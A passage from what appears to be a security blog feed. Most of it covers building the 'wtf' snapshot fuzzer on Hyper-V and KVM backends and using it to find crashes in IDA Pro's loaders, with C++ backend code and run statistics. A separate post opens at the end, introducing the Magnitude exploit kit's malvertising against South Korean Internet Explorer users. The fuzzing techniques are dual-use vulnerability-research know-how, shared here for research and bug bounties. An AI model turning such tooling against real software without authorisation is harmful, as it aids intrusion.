This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv.

I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet which was nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure.

I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker that is a project creating micro vms to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project.

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of the guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == nullptr) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}

On-demand paging

Implementing on demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and that services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When the hardware supports it, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit and I remember struggling to get the interruption fired. I am still not 100% sure that I got the details fully right but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support this VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be here and so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about 100$ / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case used generated executions of around 195 millions instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF possible. I built this corpus made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generate execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients are runners that send back results to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

bounty.png

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

elf64.png

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

Magnitude Exploit Kit: Still Alive and Kicking

29 July 2021 at 16:30

If I could choose one computer program and erase it from existence, I would choose Internet Explorer. Switching to a different browser would most likely save countless people from getting hacked. Not to mention all the headaches that web developers get when they are tasked with solving Internet Explorer compatibility issues. Unfortunately, I do not have the power to make Internet Explorer disappear. But seeing its browser market share continue to decline year after year at least gives me hope that one day it will be only a part of history.

While the overall trend looks encouraging, there are still some countries where the decline in Internet Explorer usage is lagging behind. An interesting example of this is South Korea, where until recently, users often had no choice but to use this browser if they wanted to visit a government or an e-commerce website. This was because of a law that seems very bizarre from today’s point of view: these websites were required to use ActiveX controls and were therefore only supported in Internet Explorer. Ironically, these controls were originally meant to provide additional security. While this law was finally dismantled in December 2020, Internet Explorer still has a lot of momentum in South Korea today. 

The attackers behind the Magnitude Exploit Kit (or Magniťůdek as we like to call it) are exploiting this momentum by running malicious ads that are currently shown only to South Korean Internet Explorer users. The ads can mostly be found on adult websites, which makes this an example of so-called adult malvertising. They contain code that exploits known vulnerabilities in order to give the attackers control over the victim’s computer. All the victim has to do is use a vulnerable version of Microsoft Windows and Internet Explorer, navigate to a page that hosts one of these ads and they will get the Magniber ransomware encrypting their computer.

The daily amount of Avast users protected from Magnitude. Note the drop after July 9th, which is when the attacker’s account at one of the abused ad networks got terminated.

Overview

